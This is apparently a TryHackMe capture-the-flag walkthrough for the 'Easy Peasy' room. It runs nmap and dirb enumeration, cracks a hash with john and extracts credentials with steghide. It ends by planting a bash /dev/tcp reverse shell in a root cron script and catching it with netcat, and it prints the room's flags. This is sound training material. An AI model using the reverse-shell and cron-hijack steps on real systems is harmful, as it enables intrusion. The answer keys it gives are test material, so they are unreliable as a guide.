THM — Easy Peasy

Enumeration through nmap

nmap -p- -A 10.10.107.122

How many ports are open?

What is the version of nginx?

What is running on the highest port?

Compromising the Machine

Using GoBuster, find flag 1.

dirb http://10.10.107.122-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Sep 23 20:40:33 2021
URL_BASE: http://10.10.107.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.107.122/ ----
==> DIRECTORY: http://10.10.107.122/hidden/
+ http://10.10.107.122/index.html (CODE:200|SIZE:612)
+ http://10.10.107.122/robots.txt (CODE:200|SIZE:43)

---- Entering directory: http://10.10.107.122/hidden/ ----
+ http://10.10.107.122/hidden/index.html (CODE:200|SIZE:390)
==> DIRECTORY: http://10.10.107.122/hidden/whatever/

---- Entering directory: http://10.10.107.122/hidden/whatever/ ----
+ http://10.10.107.122/hidden/whatever/index.html (CODE:200|SIZE:435)

-----------------
END_TIME: Thu Sep 23 20:40:40 2021
DOWNLOADED: 13836 - FOUND: 4

Further enumerate the machine, what is flag 2?

Crack the hash with easypeasy.txt, What is the flag 3?

What is the hidden directory?

Using the wordlist that provided to you in this task crack the hash
what is the password?

john --format=gost --wordlist=/root/Desktop/easypeasy.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2021-09-23 22:08) 50.00g/s 384000p/s 384000c/s 384000C/s mypasswordforthatjob
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

What is the password to login to the machine via SSH?

steghide extract -sf image.jpg 
Enter passphrase:
wrote extracted data to "secrettext.txt".
root@ip-10-10-32-53:~/Desktop# cat secrettext.txt
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
iconvertedmypasswordtobinary

What is the user flag?

boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
flag{n0wits33msn0rm4l}

What is the root flag?

scp -P 6498 linpeas.sh boring@10.10.107.122:/tmp/
nano .mysecretcronjob.sh 
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/**.**.**.**/4444 0>&1
nc -lvnp 4444
cat .root.txt
flag{63a9f0ea7bb98050796b649e85481845}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store